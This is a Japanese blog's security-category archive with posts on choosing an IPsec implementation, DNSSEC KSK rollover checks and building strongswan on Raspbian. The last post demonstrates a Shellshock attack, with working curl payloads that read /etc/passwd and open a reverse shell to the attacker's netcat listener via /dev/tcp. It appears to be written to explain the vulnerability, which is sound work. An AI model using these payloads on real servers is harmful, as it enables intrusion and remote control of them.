カテゴリー別アーカイブ: セキュリティ

openswan vs strongswan vs libreswan

IPsec の実装として、openswan / strongswan / libreswan どれを使えばいいの?というお話。

どの実装もかつてのFreeS/WAN IPsecの末裔であって、似た設定で動作するのだけど微妙に書式が違う、というやっかいなことになっている。

openswan:
もうメンテされていない古い実装。Ubuntu 16.04LTS も CentOS 7 もパッケージを用意していないので、あえて使う理由がない。
libreswan:
openswanのフォークで、現状メンテされている。RedHat/CentOS系は標準パッケージで用意されている。Debian/Ubuntu系にはパッケージなし。
strongswan:
ご先祖から大幅に書き直されたもの。Debian/Ubuntu系OSの場合は標準パッケージで用意されている。RedHat/CentOS系はepelレポジトリに入っている。

Fedora の場合は strongswan / libreswan どちらもパッケージが用意されている。

ということで、openswan は使わないものとして、あとは OS によってパッケージがある方を選んでおけば良いのではないか。

参考:
IPsec for Linux – strongSwan vs Openswan vs Libreswan vs other(?)

DNSSEC ルートゾーン KSK ロールオーバーについて

DNSSECのルートゾーンKSKロールオーバーについて、ロールオーバー前後でDNSの検索に支障が出ないよう、各所から通達が出ている。

ルートゾーンKSKロールオーバーによる影響とその確認方法について (JPRS)
KSKロールオーバーについて (JPNIC)

1. 管理下の DNS キャッシュは DNSSEC 検証をしているか

DNS キャッシュサーバーを管理している場合は、一応気を付けたほうが良い。管理下の DNS キャッシュサーバーに対して、dig コマンドでDNSSEC 対応済みドメイン (例: jprs.jp) の情報を検索したときに、回答に ad フラグが付いていたら「キャッシュサーバーでDNSSEC署名検証が有効になっている」状態なので、更新後の鍵を設定してやる必要があるかもしれない。

adフラグが付いている例:

$ dig jprs.jp. @mydns.example.com

; <<>> DiG 9.10.3-P4-Ubuntu <<>> jprs.jp.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26772
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 9
...

(参考: DNSSECチュートリアル~実践編~)

2. RHEL 7 / CentOS 7 + BIND の場合

named.confにデフォルトで以下の設定が入っていて、DNSSEC署名検証が有効になっている。

options {
...
        dnssec-enable yes;
        dnssec-validation yes;

        /* Path to ISC DLV key */
        bindkeys-file "/etc/named.iscdlv.key";

        managed-keys-directory "/var/named/dynamic";
...
};
...
include "/etc/named.root.key";

対処法1. パッケージアップデート

/etc/named.iscdlv.key と /etc/named.root.key に、ルートゾーンの鍵が入っている。パッケージバージョンがbind-9.9.4-38.4以降であれば、上記2ファイルに新しい鍵が追加されるので、bindのパッケージをアップデートしてしまうのが一番手っ取り早く安心できる方法ではある。

対処法2. 自動更新に任せる

9.9.4-38.3以前のパッケージを使っている場合でも、RFC5011 の自動更新に対応している。named を起動すると更新後の鍵は /var/named/dynamic/managed-keys.bind{,.jnl} として自動保存される。このため、特に何かをする必要はない。

# とはいえ、CVE-2017-3142、CVE-2017-3143への対処が9.9.4-38.5以降で行われているので、パッケージを更新した方が良い。

3. RHEL 7 / CentOS 7 + Unbound の場合

デフォルトの /var/lib/unbound/root.key には古い鍵しか入っていないが、/etc/unbound/unbound.conf に以下の記述があり、自動更新が有効になっている。

server:
...
        auto-trust-anchor-file: "/var/lib/unbound/root.key"
...

unbound のデーモンを起動すると、/var/lib/unbound/root.key に新しい鍵が追加される。

このため、これらの設定を変更していなければ、特に対処の必要はない。

4. 確認、その他

EDNS0を無効化していないこと、経路上でTCP53が通ること、フラグメントパケットが通ることも確認しておく。

大きなサイズの DNS 応答に対応できているかどうかは、DNS-OARCが確認用のレコードを用意してくれているので、以下の dig コマンドで確認できる。

$ dig +bufsize=4096 +short rs.dns-oarc.net txt

非対応のキャッシュサーバだと、以下のような回答が返ってくる。

rst.x476.rs.dns-oarc.net.
rst.x485.x476.rs.dns-oarc.net.
rst.x490.x485.x476.rs.dns-oarc.net.
"203.0.113.1 DNS reply size limit is at least 490"
"203.0.113.1 lacks EDNS, defaults to 512"
"Tested at 2017-08-31 01:19:47 UTC"

Raspbianにstrongswan 5.xをインストール

Raspberry Pi model B+ を購入して VPN 箱にしようとしたが、Raspbian OS標準のstrongswan パッケージ (=debian wheezyのパッケージ) があまりに古い (4.5.2) ので、ソースから 5.x をインストールすることにする。

1. 標準パッケージのstrongswanをアンインストール

アンインインストールする前に、起動スクリプトをバックアップしておく。

$ sudo cp /etc/init.d/ipsec /tmp

その上で、標準のstrongswanをアンインストールする。

$ sudo apt-get purge libstrongswan strongswan \
strongswan-ikev1 strongswan-ikev2 strongswan-starter

2. ビルドに必要なパッケージをインストール

$ sudo apt-get install build-essential

3. 必要そうなライブラリをインストール

$ sudo apt-get install libgmp-dev libldap2-dev \
libcurl4-openssl-dev libpam0g-dev libkrb5-dev \
libfcgi-dev libgcrypt11-dev libxml2-dev libsqlite3-dev \
libcap-dev libldns-dev libunbound-dev libsoup2.4-dev \
libtspi-dev libjson0-dev libmysqlclient-dev libpcsclite-dev

4. ビルド・インストール

wheezy-backportsパッケージのrulesファイルを参考にしてconfigureオプションを決定する。インストール先が/usr/localではなくなるけど、まあいいでしょう…
$ wget https://download.strongswan.org/strongswan-5.2.2.tar.bz2
$ tar xjf strongswan-5.2.2.tar.bz2
$ cd strongswan-5.2.2
$ ./configure \
--disable-static \
--prefix=/usr \
--exec-prefix=/usr \
--sysconfdir=/etc \
--localstatedir=/var \
--libdir=/usr/lib \
--libexecdir=/usr/lib \
--with-tss=trousers \
--enable-addrblock \
--enable-agent \
--enable-attr-sql \
--enable-ccm \
--enable-certexpire \
--enable-cmd \
--enable-coupling \
--enable-ctr \
--enable-curl \
--enable-dhcp \
--enable-dnscert \
--enable-duplicheck \
--enable-eap-aka \
--enable-eap-aka-3gpp2 \
--enable-eap-dynamic \
--enable-eap-gtc \
--enable-eap-identity \
--enable-eap-md5 \
--enable-eap-mschapv2 \
--enable-eap-peap \
--enable-eap-radius \
--enable-eap-sim \
--enable-eap-sim-file \
--enable-eap-sim-pcsc \
--enable-eap-simaka-pseudonym \
--enable-eap-simaka-reauth \
--enable-eap-simaka-sql \
--enable-eap-tls \
--enable-eap-tnc \
--enable-eap-ttls \
--enable-error-notify \
--enable-farp \
--enable-gcm \
--enable-gcrypt \
--enable-imc-attestation \
--enable-imc-os \
--enable-imc-scanner \
--enable-imc-swid \
--enable-imc-test \
--enable-imv-attestation \
--enable-imv-os \
--enable-imv-scanner \
--enable-imv-swid \
--enable-imv-test \
--enable-integrity-test \
--enable-ipseckey \
--enable-ldap \
--enable-led \
--enable-load-tester \
--enable-lookip \
--enable-md4 \
--enable-mysql \
--enable-ntru \
--enable-openssl \
--enable-pkcs11 \
--enable-radattr \
--enable-soup \
--enable-sql \
--enable-sqlite \
--enable-systime-fix \
--enable-test-vectors \
--enable-tnccs-11 \
--enable-tnccs-20 \
--enable-tnccs-dynamic \
--enable-tnc-ifmap \
--enable-tnc-imc \
--enable-tnc-imv \
--enable-tnc-pdp \
--enable-unbound \
--enable-unity \
--enable-whitelist \
--enable-xauth-eap \
--enable-xauth-generic \
--enable-xauth-noauth \
--enable-xauth-pam \
--disable-blowfish \
--disable-des \
--with-capabilities=libcap
$ make
$ sudo make install

さすがにCPUの能力が低いので、ビルドには時間がかかる。

最初にコピーしておいた起動スクリプトを戻す。
$ sudo mv /tmp/ipsec /etc/init.d/
$ sudo update-rc.d ipsec defaults

bash脆弱性を利用した攻撃の例

bashの脆弱性をそのままにしているWebサーバがある場合、環境変数 (User-AgentなどHTTPヘッダとして渡せば受け取ってくれる) に脆弱性を突く文字列+任意のコマンドを埋め込んで実行できる。

条件としては、さらにサーバ上に「bashを実行しそうな実在のCGIスクリプト」などが存在することが必要。CGIスクリプトの言語がshまたはbashであればその条件に該当するし、仮にPHPやPythonだったとしても、system関数などを使っていれば/bin/shが起動されるため該当する。

※RedHat, CentOS6では/bin/sh -> /bin/bashへのシンボリックリンクであるため上記が成立するが、Debian系など他のシステムでは成立しないかもしれない。以下はRedHat Enterprise Linux 6で検証している。

1. サーバ側でcat /etc/passwdを実行させる例

curlコマンドの-A(User-Agent:ヘッダを指定する)オプションを使用して、文字列を送り込む。

attacker-pc$ curl -A "() { :;};echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://攻撃対象サーバのホスト名orIPアドレス/cgi-bin/test.cgi

/cgi-bin/test.cgi は、実在する(かつ内部でbashを呼び出す)必要がある。

2. 攻撃者側へサーバのbashインタラクティブシェルを開く例

bashの/dev/tcp/host/port入出力エミュレート機能というのがあって、デバイスファイルへの書き込みが特定ホスト/ポートへのTCPパケット送出となるようになっている。

参考: suztomoの日記 – ncコマンドとbashの/dev/tcpで通信

以下、この機能を使って攻撃者側にシェルプロンプトを開いてみる実行例。
攻撃者は端末(tty1)で、ncコマンドなどを使いTCPの特定ポートを待ち受ける。以下の例では3333番ポートである。

attacker-pc-tty1$ nc -l -p 3333

このtty1端末はそのまま待ち受け状態となる。

ここでもう一つ端末(tty2)を立ち上げて、攻撃用のcurlコマンドを実行する。

attacker-pc-tty2$ curl -A "() { :;};/bin/bash -i >& /dev/tcp/攻撃者PCのグローバルIPアドレス/3333 0>&1" http://攻撃対象サーバのホスト名orIPアドレス/cgi-bin/test.cgi

すると、さきほどのtty1にサーバのシェルプロンプトが現れる。

attacker-pc-tty1$ nc -l -p 3333
bash: no job control in this shell
bash-4.1$ 

サーバ側から攻撃者PCのTCP3333番へ接続され、bashの入出力が接続された状態となった。

apacheの権限でできることであれば、ここから何でもインタラクティブに実行可能である。

※SELinuxが有効になっていれば、2.のパターンの実行は阻止される。このときhttpdのエラーログに”sh: /dev/tcp/aa.bb.cc.dd/3333: Permission denied”が記録される。

実験環境:
RedHat Enterprise Linux 6.5 x86_64
bash-4.1.2-15.el6_4

参考にしたサイト:
x86-64.jp – bashの脆弱性がヤバすぎる件
ワルブリックス株式会社 – BASHの脆弱性でCGIスクリプトにアレさせてみました
もろず blog – bash の脆弱性 “Shell Shock” のめっちゃ細かい話 (CVE-2014-6271)